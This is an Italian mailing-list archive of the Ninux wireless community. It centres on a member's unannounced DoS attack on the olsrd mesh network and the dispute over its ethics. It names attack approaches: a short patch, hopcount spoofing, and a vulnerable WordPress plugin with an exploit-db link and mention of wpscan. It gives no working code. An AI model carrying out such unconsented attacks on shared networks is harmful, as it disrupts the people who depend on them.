Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Radio Emissions Project
Scusa una domanda Zio,
ma quale autorizzazione hai o ti senti di avere più degli altri nel
progettare e realizzare un attacco del genere all'interno di una rete nella
quale si è tutti uguali? E' questo il punto... Per verificare se la rete
può essere attaccata con facilità non è necessario fare tutto di
nascosto... Anzi, credo che se tu avessi avvisato, magari si poteva fare
qualche controllino in più no?
Saluti.



Dr. Gabriele Cataldi
--
European Geosciences Union (EGU ) member
Seismology (SM3.2) Earthquake precursors, bioanomalies prior to earthquakes
and prediction.
Natural Hazard (NH4.3) Electro-magnetic phenomena and connections with
seismo-tectonic activity.

American Geophysical Union (AGU ) member



Radio Emissions
Project
LTPA Observer Project 
ltpaobserverproj...@gmail.com




Il giorno 25 maggio 2014 13:50, Saverio Proto  ha
scritto:

> Il 25 maggio 2014 10:13, Netsoul  ha scritto:
> >
> > Una volta queste cose venivano organizzate. Certo, il gestore non doveva
> conoscere la metodologia, ma almeno l'arco > temporale in cui si sarebbero
> svolti i pentest. Almeno a me così hanno insegnato. Farlo "al buio"  e poi
> vantarsi di
>  > averlo deliberatamente fatto vuol dire aver  mettesso in difficoltà
> persone che magari proprio in quell'arco temporale
> > avevano bisogno della rete o più semplicemente stavano cercando di
> risolvere piccoli bug (che poi non capisci se è >stato il tuo bug a fottere
> la rete o la rete che fotte te)
> > Boh, forse sbaglio io eh! Ma "ai miei tempi"  se volevi fare una cosa
> fatta bene e professionale avvisavi e poi postavi >l'eventuale dump a
> beneficio di tutti...
>
> Ciao Netsoul,
>
> il tuo nick mi è nuovo, quindi prima di tutto piacere di conoscerti.
>
> le tue osservazioni sono corrette, ma io non volevo solo fare un
> esperimento tecnico, ma un esperimento "community".
>
> Ero ti spiego perché farlo "al buio".
>
>
> Parte tecnica:
> abbiamo capito che con una patch da 4 righe si può fare un attacco DoS
> che funziona.
> abbiamo capito che se il TTL non è forgiato possiamo capire a quanti
> hop da noi è l'attaccante, e provare a identificarlo.
>
> Parte community:
> fino alla risoluzione del problema non è girata nemmeno una email su
> lista wireless o nodi-roma. C'è quindi un gruppetto che lavora per
> fatti suoi. Un gruppetto chiuso. Questo è una male per la community.
> Non vengono coinvolte tutte le persone nelle cose tecniche ma solo gli
> amichetti.
>
> solo alla soluzione del problema è stato a questo punto scritto su
> nodi-roma, ma perché? tanto valeva scrivere a me ? E' stato scritto
> perché si doveva additare "il cattivo". A quel punto tanta gente
> simpatizzante di Andrea e con poche competenza tecnica ha rincarato la
> dose attaccando "il cattivo". Si è arrivati a richiedere una punizione
> con per "il cattivo". Ci vorrebbe qualcuno con piu competenze di me in
> psicologia per analizzare in fenomeno.
>
> La parte tecnica è andata totamente in secondo piano. Non sono stati
> dati dettagli di come è stato trovato l'attaccante. Non sono state
> date risposte alle domande tecniche fatte. Io avevo lanciato degli
> inviti interessati come l'articolo sul blog ma non mi è stato dato
> alcun seguito.
>
> era proprio questo tipo di esperimento che volevo fare !
> questa community ha bisogno di una cura :)
>
> ciao,
>
> Saverio
> ___
> Wireless mailing list
> Wireless@ml.ninux.org
> http://ml.ninux.org/mailman/listinfo/wireless
>
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


[Ninux-Wireless] R: Re: [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione hackerredenti
Dipende dal sito e da quello che bisogna farci... 
Wpscan fa molto rumore... 

 Messaggio originale 
Da: Saverio Proto
Data:26/05/2014 00:35 (GMT+01:00)
A: wireless
Oggetto: Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: 
"Malfunzionamento" a Gallia

Mitici :)
Files php rimasti li a marcire perché il plugin era disabilitato :) ma
cmq una minaccia. Ho fixato,anche perché era vulnerabile anche il sito
di Ciemmona.

Ho fixato ;)

Dai logs ho beccato la vostra scansione. Usate un tool immagino. Ho
visto che prova un sacco di plugins noti. Quale tool usate?

bella !

Saverio




___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Saverio Proto
Mitici :)
Files php rimasti li a marcire perché il plugin era disabilitato :) ma
cmq una minaccia. Ho fixato,anche perché era vulnerabile anche il sito
di Ciemmona.

Ho fixato ;)

Dai logs ho beccato la vostra scansione. Usate un tool immagino. Ho
visto che prova un sacco di plugins noti. Quale tool usate?

bella !

Saverio



Il 25 maggio 2014 22:17, lilo  ha scritto:
> Il 25/05/2014 21:04, Net Soul ha scritto:
>> non vorrei dire una cazzata, ma sulle possibili TTL-poisoning si era scritto 
>> da qualche parte , ed in effetti esisteva un calcolo piuttosto rudimentale 
>> per capire se gli hopcount erano originali o meno.Mo' mi documento che mi 
>> avete fatto prudere le maniNetSoul
>
> e cmq il blog di Saverio e' un colabrodo
>
> ahahahha.. ops
>
> esempio di etica: il punto di accesso è qui:
>
> chikuncount - v1.3 plugin vulnerabile
>
> approfondi-mentos e affermita' [cit.]:
>
> http://www.exploit-db.com/exploits/24492/
>
> un kattivone avrebbe potuto upparti una backdoor
>
> l'admin di default nel wordpress...
>
> /me HIDE :D
>
> e con questa confido nel fatto che relax e condivisione winwin.
>
>
>
>>> Date: Sun, 25 May 2014 20:27:54 +0200
>>> From: ziopr...@gmail.com
>>> To: wireless@ml.ninux.org
>>> CC: nodi-r...@ml.ninux.org
>>> Subject: Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: 
>>> "Malfunzionamento" a Gallia
>>>
>>> Ciao Alessandro,
>>>
>>
>>> Inoltre mi dici se il tuo metodo funzionava anche un caso di TTL
>>> spoofato ? Se lanciavo i messaggi con hopcount gia settato a 10,
>>> avresti saputo dire con certezza che l'attacco passava da Gallia ?
>>> Ripeto, che succede se faccio m->v4.hopcnt = XXX ?
>
>
>
> --
> lilo
> http://wiki.debian.org/LILO
> 
> -Da grande faro' il cattivo esempio, questo e' uno stage formativo-
> bit in rebels
> GnuPG/PGP Key-Id: 0x10318C92
> FINGERPRINT: 47BE F025 DD21 949F 681E 1D2B 1C2C DA80 1031 8C92
> server: pgp.mit.edu
>
>
> ___
> Wireless mailing list
> Wireless@ml.ninux.org
> http://ml.ninux.org/mailman/listinfo/wireless
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] E' nato il forum...usiamolo

2014-05-25 Per discussione BornAgain

Il giorno 25/mag/2014, alle ore 22.47, Edoardo Mazzaracchio ha scritto:

> Gentili signori, in attesa di collocazione server in mini sala ced o più 
> avanti in farm direttamente ho spostato il tutto su un'altra macchina: ip 
> esterno resta quello, ip interno diventa
> 10.135.6.99

aggiornato l'ip nella pagina Servizi del wiki


> Scusate per i problemi!
> -Nazza
> 




BornAgain

bornag...@autoproduzioni.net 

Nodo su wireless comunitaria Ninux.org 
http://map.ninux.org/select/reggiocalbornagain/



___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] nuova rete comunitaria, in trentino

2014-05-25 Per discussione Gioacchino Mazzurco
On Saturday 24 May 2014 20:54:08 Leonardo wrote:
> ieri sera io e due ragazzi di Guifi (in visita a Trento) abbiamo fatto
> una presentazione a Vigolo Vattaro, un paesino vicino a Trento, ad una
> trentina di persone interessate a creare una rete comunitaria nella
> valle. La cosa ottima è che l'iniziativa è nata proprio da loro e che
> siamo stati almeno due ore a parlare di cosa è e cosa non è una rete
> wireless comunitaria. Come funziona ninux, specialmente l'esperienza di
> Firenze che ovviamente conosco meglio.

Grandi!!


> Alla fine hanno fatto una mailing list, e spero che presto cominceranno
> a montare un po' di nodi. Spero che decideranno di chiamarsi ninux ed
> entrare nel nostro mondo!

Si sarebbe un ottima cosa se si riuscisse a instaurare una collaborazione con 
questa nuova comunita` sul nome io non mi ci focalizzarei tanti perche' gia 
tra le comunita' ninux annoveriamo eigennet, iuili, korneolo etc etc

Per dare un idea della dimensione nazionale del movimento secondo me e' 
importante invece che riusciamo ad aver euna mappa su cui appaiano ttte le 
isole :)


> Oltre a questo, c'erano due ragazzi di una rete in un altro paese
> vicino, che già esiste e conta una 30ina di nodi
> (http://www.gallianetwork.it/). Loro hanno un'associazione e forniscono
> connettività internet, e, dalle loro parole mi pare che soffrano degli
> stessi problemi di cui abbiamo sentito anche per il progetto Neco al
> ninuxday (sintetizzando, poca partecipazione).

Se la loro idea di rete comunitaria e' compatibile con quella di ninux io 
direi che sarebbe il caso di lanciare una collaborazione anche con loro, e 
magari cercare di farli apparire pure su nodeshot


> Ho invitato tutti a iscriversi a questa ml, in modo da cominciare a
> condividere esperienze, problemi e soluzioni, e spero che già lo abbiano
> fatto.

Hai fatto benissimo!
Sono i benvenuti!
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] E' nato il forum...usiamolo

2014-05-25 Per discussione Edoardo Mazzaracchio
Gentili signori, in attesa di collocazione server in mini sala ced o più
avanti in farm direttamente ho spostato il tutto su un'altra macchina: ip
esterno resta quello, ip interno diventa 10.135.6.99
Scusate per i problemi!
-Nazza


Il giorno 25 maggio 2014 00:54, Edoardo Mazzaracchio <
edoardo.mazzaracc...@gmail.com> ha scritto:

> Ciao a tutti, per ora per problemi di calore (la stanza dove sta non
> ventila bene) devo tirare giù la macchina, domani lo sposto in area più
> ventilata. Scusate per il disservizio!
> Il 24/mag/2014 15:21 "Fabio Capriati"  ha
> scritto:
>
> Ecco Daniela, questa cosa la potevi scrivere sul Forum, c'è la sezione:
>>
>> FORUM DEVELOPMENT
>> Proposte per migliorare questo servizio
>>
>>  daje co sto forum!!!
>>
>>
>> Il giorno sab, 24/05/2014 alle 13.56 +0100, Daniela Ruggeri ha scritto:
>> > BELLO!
>> >
>> >
>> > Magari per Il nome NINUX usate un font più largo
>> >
>> >
>> > Ciao :-)
>> > Daniela
>> >
>> >
>> >
>> > Key GPG ID: AA2DA887
>> > 
>> > Un guerriero accetta la sua parte, qualunque possa essere, e l'accetta
>> > in assoluta umilta'. Accetta in umilta' cio' che egli e', e non ne fa
>> > motivo di rimpianto ma di sfida. Io conosco soltanto l’umilta' del
>> > guerriero, e questa non mi permettera' mai di schiavizzare qualcuno.
>> > Carlos Castaneda.
>> > Il Sabato 24 Maggio 2014 12:20, Edoardo Mazzaracchio
>> >  ha scritto:
>> >
>> >
>> >
>> > Ricordo inoltre che l'indirizzo pubblico è temporaneo, non voglio
>> > appropriarmi di alcunché, è solo che prima di hostarlo in farm Fish
>> > vuole giustamente delle garanzie di funzionamento, quindi va rodato
>> > bene.
>> >
>> >
>> > Pertanto... USATELO! Poi lo metteremo in qualcosa come
>> > http://forum.ninux.org
>> >
>> >
>> >
>> > Il giorno 24 maggio 2014 12:13, Danilo Larizza 
>> > ha scritto:
>> > Come giustamente suggerito da Simone
>> >
>> > comunichiamo che e' nato il tanto amato/contestato forum!
>> >
>> > Ecco gli indirizzi :
>> >
>> >
>> > ip interno: http://10.135.6.149
>> > indirizzo pubblico: http://nazza.servebeer.com
>> >
>> >
>> > Fatevi avanti per migliorarlo...e usatelo :)
>> >
>> > Saluti
>> >
>> > --
>> > www.danilolarizza.com
>> >
>> > ___
>> > Wireless mailing list
>> > Wireless@ml.ninux.org
>> > http://ml.ninux.org/mailman/listinfo/wireless
>> >
>> >
>> >
>> > ___
>> > Wireless mailing list
>> > Wireless@ml.ninux.org
>> > http://ml.ninux.org/mailman/listinfo/wireless
>> >
>> >
>> >
>> > ___
>> > Wireless mailing list
>> > Wireless@ml.ninux.org
>> > http://ml.ninux.org/mailman/listinfo/wireless
>>
>>
>> ___
>> Wireless mailing list
>> Wireless@ml.ninux.org
>> http://ml.ninux.org/mailman/listinfo/wireless
>>
>>
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Net Soul

;P

> Date: Sun, 25 May 2014 22:17:41 +0200
> From: al3l...@autistici.org
> To: wireless@ml.ninux.org
> Subject: Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: 
> "Malfunzionamento" a Gallia

> 
> e cmq il blog di Saverio e' un colabrodo
> 
> ahahahha.. ops
> 
> esempio di etica: il punto di accesso è qui:
> 
> chikuncount - v1.3 plugin vulnerabile
> 
> approfondi-mentos e affermita' [cit.]:
> 
> http://www.exploit-db.com/exploits/24492/
> 
> un kattivone avrebbe potuto upparti una backdoor
> 

  ___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Alberto Pizzini
Dopo aver letto anche oggi una sequela di mail infinita su questo argomento
posso dire di essere stanco.
Posso solo pensare che sia pazzo chi pensa che questa sia la strada giusta
per portare Ninux ad essere un progetto rispettato, conosciuto e presente
su tutto il territorio nazionale.
Non deluderò nessuno perché penso che tutte e due la parti abbiano ragione
e torto allo stesso tempo

Saverio, mi spieghi chi ti ha dato il diritto di trattare tutta la rete, e
quindi le persone che ne fanno parte, alla stregua di cavie per questo tuo
presunto esperimento sociologico/psicologico? Ninux per te è forse uno Zoo?
Netsoul, Halino e Edoardo hanno perfettamente ragione, il primo a non
essere stato collaborativo e a decidere egoisticamente per tutti sei stato
te e chi ti ha appoggiato in questo "scherzo" ovvero un gruppo chiuso di
persone che non ha detto niente a nessuno, esattamente quello che volevi
combattere. Come già successo non sono  state valutate veramente bene le
conseguenze di determinate azioni e queste ultime hanno direttamente o
indirettamente colpito molti. Già in passato hai preso decisioni che hanno
avuto ripercussioni sul prossimo senza chiedere niente a nessuno o
avvertire gli interessati, (cambio OS sulle antenne del Sans senza
avvertire i nodi collegati) il casino e la riunione che ne derivarono non
sembra abbiano toccato minimamente il tuo atteggiamento.


Sarebbe stato molto più divertente fare un test tutti insieme, un giovedì o
un fine settimana, in modo tale da testare la rete in modo CONSENZIENTE e
COMUNITARIO, magari permettendo a qualcuno di imparare qualcosa lavorando
in affiancamento con altri. Si potevano evitare rabbia e astio. Se hai
problemi con certe dinamiche che si son create in Ninux, dovresti
utilizzare il dialogo piuttosto che la prevaricazione per portarli alla
luce. Pensi che quello che è successo cambierà le cose? Secondo me sei
riuscito solo a rafforzare certi atteggiamenti piuttosto che a combatterli,
il tuo scopo poteva anche essere valido, ma i tuoi metodi hanno creato solo
un gran casino.



D'altro canto Andrea te richiedi di prendere questi "provvedimenti" che mi
sembra quantomeno assurdo. Capisco il tuo punto di vista, capisco che te ed
altre persone avete perso un sacco di tempo per risolvere i problemi
derivati dall'attacco, ma non puoi fare una richiesta simile ad una
comunità come la nostra. Chi dovrebbe essere il giudice? chi l'esecutore?
Non esistiamo neanche "ufficialmente", siamo un insieme di singole persone
che hanno in mente un progetto, se a qualcuno non sta bene quello che ha
fatto Saverio prenda i provvedimenti  che desidera, ma non è possibile
richiedere che sia adottata una linea comune o iniziare una guerra che crei
ulteriori danni collaterali. Piuttosto alla prossima decisionale si discuta
di aggiungere nelle line guida che iniziative simili non sono considerate
"community correct" o come si voglia dire. Non penso che l'attacco sia
stato diretto specificamente contro di te, piuttosto contro la farm che
tieni su per la comunità; come dice Arkanet è il bersaglio più logico per
qualunque attacco. Capisco che tu ed altri siate incazzati, ma non dovete
mai perdere di vista che la cosa più importante è portare avanti Ninux, e
di conseguenza sforzarsi di mantenere la calma e non fare in lista pubblica
richieste o affermazioni pericolose, soprattutto in un periodo di
espansione e crescita come questo.

Sinceramente spero che gli interessati da questa situazione si incontrino
per parlarne a quattrocchi piuttosto che continuare a dire "ci vediamo al
fusolab" "ci vediamo al sans" e a discutere via mail, modo impersonale e
che spesso non aiuta a risolvere i problemi. Ci sarà qualcuno abbastanza
lungimirante dal tendere la mano per primo e mettersi in discussione?

Detto questo mi auguro vivamente per il bene di tutti che questa sia la
prima e l'ultima volta che avvenga qualcosa di così increscioso.
Collaborazione avanti a tutto, o finiremo per comportarci come le
generazioni che hanno distrutto il nostro paese.




>
> -
Alberto Pizzini aka Pandino
Nodo PandinoNet
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione lilo
Il 25/05/2014 21:04, Net Soul ha scritto:
> non vorrei dire una cazzata, ma sulle possibili TTL-poisoning si era scritto 
> da qualche parte , ed in effetti esisteva un calcolo piuttosto rudimentale 
> per capire se gli hopcount erano originali o meno.Mo' mi documento che mi 
> avete fatto prudere le maniNetSoul

e cmq il blog di Saverio e' un colabrodo

ahahahha.. ops

esempio di etica: il punto di accesso è qui:

chikuncount - v1.3 plugin vulnerabile

approfondi-mentos e affermita' [cit.]:

http://www.exploit-db.com/exploits/24492/

un kattivone avrebbe potuto upparti una backdoor

l'admin di default nel wordpress...

/me HIDE :D

e con questa confido nel fatto che relax e condivisione winwin.



>> Date: Sun, 25 May 2014 20:27:54 +0200
>> From: ziopr...@gmail.com
>> To: wireless@ml.ninux.org
>> CC: nodi-r...@ml.ninux.org
>> Subject: Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: 
>> "Malfunzionamento" a Gallia
>>
>> Ciao Alessandro,
>>
> 
>> Inoltre mi dici se il tuo metodo funzionava anche un caso di TTL
>> spoofato ? Se lanciavo i messaggi con hopcount gia settato a 10,
>> avresti saputo dire con certezza che l'attacco passava da Gallia ?
>> Ripeto, che succede se faccio m->v4.hopcnt = XXX ?



-- 
lilo
http://wiki.debian.org/LILO

-Da grande faro' il cattivo esempio, questo e' uno stage formativo-
bit in rebels
GnuPG/PGP Key-Id: 0x10318C92
FINGERPRINT: 47BE F025 DD21 949F 681E 1D2B 1C2C DA80 1031 8C92
server: pgp.mit.edu


___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Net Soul
non vorrei dire una cazzata, ma sulle possibili TTL-poisoning si era scritto da 
qualche parte , ed in effetti esisteva un calcolo piuttosto rudimentale per 
capire se gli hopcount erano originali o meno.Mo' mi documento che mi avete 
fatto prudere le maniNetSoul

> Date: Sun, 25 May 2014 20:27:54 +0200
> From: ziopr...@gmail.com
> To: wireless@ml.ninux.org
> CC: nodi-r...@ml.ninux.org
> Subject: Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: 
> "Malfunzionamento" a Gallia
> 
> Ciao Alessandro,
> 

> Inoltre mi dici se il tuo metodo funzionava anche un caso di TTL
> spoofato ? Se lanciavo i messaggi con hopcount gia settato a 10,
> avresti saputo dire con certezza che l'attacco passava da Gallia ?
> Ripeto, che succede se faccio m->v4.hopcnt = XXX ?
> 

  ___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [Cogitoergohack] AP @ Lucernario Occupato

2014-05-25 Per discussione Saverio Proto
Ciao Leo,

yes no problem :) Occhio solo a quanta banda usate.
Se uscite su una connettività che avete a disposizione voi, allora
fate come vi pare.
Se mandate il traffico Internet verso Ninux, fate un traceroute per
capire da dove uscite, ed avvisate il gestore del nodo. Vi dirà lui se
gli va bene, se dovete fare shaping per non collassargli l'ADSL, o
altro.

Abbiamo un pacchetto OpenWrt di nodogsplash ninux (captive portal),
con una bella grafica pronta da usare. Apre una pagine dove ci sono
delle info, poi uno clicca "OK" e va avanti.

Sta tutto su github, o di default installato sul firmware ScooreggioneV5

Se volete passo volentieri all'hacklab un giorno dopo il lavoro per
smanettare sulla Splash Page.

Saverio


Il 25 maggio 2014 16:19, Leo  ha scritto:
> Ciao a tutt*,
> sono Blallo (Leonardo) dell'InsomniaLab
> (hacklab della Sapienza), nodo
> hacklab-sapienza [^].
>
> Scrivo a titolo personale, ma questa era
> un'idea che è già circolata in assemblea
> da noi: c'è qualche problema se mettiamo
> un AP pubblico da noi e pubblicizziamo
> ninux?
> Mi sembra che il manifesto [*] sia in accordo
> con una cosa del genere.
>
> Saluti
>
> Blallo
>
> [^] http://map.ninux.org/select/hacklab-lucernario/
> [*] http://wiki.ninux.org/Manifesto
>
> --
> "Unhappy is the land that needs a hero" G.G. by B.B.
>
> ___
> Cogitoergohack mailing list
> cogitoergoh...@autistici.org
> https://www.autistici.org/mailman/listinfo/cogitoergohack
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Saverio Proto
Ciao Alessandro,

allora mi spieghi benissimo come hai fatto ? :)

vedendo i messaggi con un TTL ad un certo numero come hai fatto con
certezza a capire che i messaggi spoofati arrivavano da Gallia ?
Questo ancora non è chiaro dalla tua spiegazione. Sicuramente c'è un
conto (magari grossolano) che hai fatto e ci vuoi spiegare.
Ho anche pensato che forse avevate un email di massima ed avete
mandato un email che era un mezzo bluff per vedere se uscivo allo
scoperto. Dacci maggiori dettagli.

Inoltre mi dici se il tuo metodo funzionava anche un caso di TTL
spoofato ? Se lanciavo i messaggi con hopcount gia settato a 10,
avresti saputo dire con certezza che l'attacco passava da Gallia ?
Ripeto, che succede se faccio m->v4.hopcnt = XXX ?

Soluzioni:
1) Se riesci col tuo metodo a capire da dove partono i pacchetti
spoofati bisogna isolare fisicamente il nodo attaccante.
2) Bisogna in generale creare domini IGP piu piccoli. Non dico di
arrivare come fanno i greci dove ogni nodo è un AS separato, ma
potremmo fare delle frontiere dove si parla BGP in modo da limitare il
dominio nel quale un attaccante può operare.

Per la "non fiducia" non ti preoccupare, è reciproca ! Sono mesi che
cambiato la politica di accesso ai miei apparati di Ninux :)
Sinceramente trovo controproducente condividere l'accesso ai miei
apparati con un gruppetto chiuso che non scrive nemmeno una email su
nodi-roma mentre analizza un problema per 3 giorni... e poi scrive
solo a cose finite "ho risolto".

Saverio


Il 25 maggio 2014 14:45, Alessandro Gnagni  ha scritto:
> Va be save, hai sempre ragione tu.
> All'inizio sembrava un problema di configurazioni da parte di pierluigi
> sulle sue macchine.
> Dopo aver appurato che era tutto ok ieri sera alle 9 mi sono messo a cercare
> di analizzare la cosa a fondo.
> Io posso spiegare benissimo come ho fatto, solo onestamente non mi fido più
> di te.
> Io avrei preferito che tu agissi con maggior chiarezza, cosa che tu chiedi
> sempre agli altri.
> Tanto ormai solo quello che fai tu è giusto... noi sbagliamo sempre.
> Ma non riesci a fare le cose comunicando con gli altri? Siamo una community,
> tu invece ti sei rintanato nel tuo antro a scrivere codice per creare bug.
> Lo sappiamo tutti che volendo olsr è attaccabbile in milioni di modi, ma per
> questo tuo bug hai creato un problema, senza proporrere una soluzione.
>
> Il 25/mag/2014 13:50 "Saverio Proto"  ha scritto:
>>
>> Il 25 maggio 2014 10:13, Netsoul  ha scritto:
>> >
>> > Una volta queste cose venivano organizzate. Certo, il gestore non doveva
>> > conoscere la metodologia, ma almeno l'arco > temporale in cui si sarebbero
>> > svolti i pentest. Almeno a me così hanno insegnato. Farlo "al buio"  e poi
>> > vantarsi di
>>  > averlo deliberatamente fatto vuol dire aver  mettesso in difficoltà
>> persone che magari proprio in quell'arco temporale
>> > avevano bisogno della rete o più semplicemente stavano cercando di
>> > risolvere piccoli bug (che poi non capisci se è >stato il tuo bug a fottere
>> > la rete o la rete che fotte te)
>> > Boh, forse sbaglio io eh! Ma "ai miei tempi"  se volevi fare una cosa
>> > fatta bene e professionale avvisavi e poi postavi >l'eventuale dump a
>> > beneficio di tutti...
>>
>> Ciao Netsoul,
>>
>> il tuo nick mi è nuovo, quindi prima di tutto piacere di conoscerti.
>>
>> le tue osservazioni sono corrette, ma io non volevo solo fare un
>> esperimento tecnico, ma un esperimento "community".
>>
>> Ero ti spiego perché farlo "al buio".
>>
>>
>> Parte tecnica:
>> abbiamo capito che con una patch da 4 righe si può fare un attacco DoS
>> che funziona.
>> abbiamo capito che se il TTL non è forgiato possiamo capire a quanti
>> hop da noi è l'attaccante, e provare a identificarlo.
>>
>> Parte community:
>> fino alla risoluzione del problema non è girata nemmeno una email su
>> lista wireless o nodi-roma. C'è quindi un gruppetto che lavora per
>> fatti suoi. Un gruppetto chiuso. Questo è una male per la community.
>> Non vengono coinvolte tutte le persone nelle cose tecniche ma solo gli
>> amichetti.
>>
>> solo alla soluzione del problema è stato a questo punto scritto su
>> nodi-roma, ma perché? tanto valeva scrivere a me ? E' stato scritto
>> perché si doveva additare "il cattivo". A quel punto tanta gente
>> simpatizzante di Andrea e con poche competenza tecnica ha rincarato la
>> dose attaccando "il cattivo". Si è arrivati a richiedere una punizione
>> con per "il cattivo". Ci vorrebbe qualcuno con piu competenze di me in
>> psicologia per analizzare in fenomeno.
>>
>> La parte tecnica è andata totamente in secondo piano. Non sono stati
>> dati dettagli di come è stato trovato l'attaccante. Non sono state
>> date risposte alle domande tecniche fatte. Io avevo lanciato degli
>> inviti interessati come l'articolo sul blog ma non mi è stato dato
>> alcun seguito.
>>
>> era proprio questo tipo di esperimento che volevo fare !
>> questa community ha bisogno di una cura :)
>>
>> ciao,
>>
>> Saverio
>> __

Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Gioacchino Mazzurco
On Sunday 25 May 2014 13:50:01 Saverio Proto wrote:
> dose attaccando "il cattivo". Si è arrivati a richiedere una punizione
> con per "il cattivo". Ci vorrebbe qualcuno con piu competenze di me in
> psicologia per analizzare in fenomeno.

Anche a me sta roba della punizione esemplare mi ha fatto rabbrividire... a 
cosa mi e' suonato meglio che non lo dico forse...
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] R: Re: [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione lilo
Il 25/05/2014 16:10, Alessandro Gnagni ha scritto:
> Io sarò al fusolab. Onestamente lilo non sono riuscito a seguire bene il
> tuo discorso.

Ale, NON sto dicendo "non andate/andiamo al fusolab".

sto dicendo che chi fosse interessato ad approfondire il discorso, si
potrebbe organizzare al Sans c/Saverio un qualcosa di interessante lato
tecnica ed etica.

e pure questa e' una "cura" :P

per la parte di "cura" in particolare cui riferisce Saverio, mi metto
comoda, popcorn, e osservo :-)

possibilmente SENZA pregiudizi, verso NESSUNO. cervello in chiaro.

solo questo..

una crescita positiva collettiva, da un test che ha fatto incazzar...

vabbe' cmq Save', me metto UNPLUGGED aho', nun se sa mai AHAHAHAHA

daje, ninux e' un qualcosa di straordianrio, perche' le persone che ne
fanno parte sono TUTTE straordinariamente diverse.

e' cosi'.

e mo vojo sape' del "gruppetto chiuso", tacci vostri :-)

ma NON qui. le persone vanno guardate negli occhi, non ci sono
sufficienti BIT per pixellizzare uno sguardo. inshalla'.


-- 
lilo
http://wiki.debian.org/LILO

-Da grande faro' il cattivo esempio, questo e' uno stage formativo-
bit in rebels
GnuPG/PGP Key-Id: 0x10318C92
FINGERPRINT: 47BE F025 DD21 949F 681E 1D2B 1C2C DA80 1031 8C92
server: pgp.mit.edu


___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] AP @ Lucernario Occupato

2014-05-25 Per discussione Andrea Pescetelli
Ciao Leo
Voi avete gia' connettivita' al lucernario giusto?
Potete installare l'hot spot utilizzando la vostra connettivita' con
splashpage.
Il 25/mag/2014 16:19 "Leo"  ha scritto:

> Ciao a tutt*,
> sono Blallo (Leonardo) dell'InsomniaLab
> (hacklab della Sapienza), nodo
> hacklab-sapienza [^].
>
> Scrivo a titolo personale, ma questa era
> un'idea che è già circolata in assemblea
> da noi: c'è qualche problema se mettiamo
> un AP pubblico da noi e pubblicizziamo
> ninux?
> Mi sembra che il manifesto [*] sia in accordo
> con una cosa del genere.
>
> Saluti
>
> Blallo
>
> [^] http://map.ninux.org/select/hacklab-lucernario/
> [*] http://wiki.ninux.org/Manifesto
>
> --
> "Unhappy is the land that needs a hero" G.G. by B.B.
>
> ___
> Wireless mailing list
> Wireless@ml.ninux.org
> http://ml.ninux.org/mailman/listinfo/wireless
>
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


[Ninux-Wireless] AP @ Lucernario Occupato

2014-05-25 Per discussione Leo
Ciao a tutt*,
sono Blallo (Leonardo) dell'InsomniaLab
(hacklab della Sapienza), nodo
hacklab-sapienza [^].

Scrivo a titolo personale, ma questa era
un'idea che è già circolata in assemblea
da noi: c'è qualche problema se mettiamo
un AP pubblico da noi e pubblicizziamo
ninux?
Mi sembra che il manifesto [*] sia in accordo
con una cosa del genere.

Saluti

Blallo

[^] http://map.ninux.org/select/hacklab-lucernario/
[*] http://wiki.ninux.org/Manifesto

-- 
"Unhappy is the land that needs a hero" G.G. by B.B.

___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] R: Re: [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Alessandro Gnagni
Io sarò al fusolab. Onestamente lilo non sono riuscito a seguire bene il
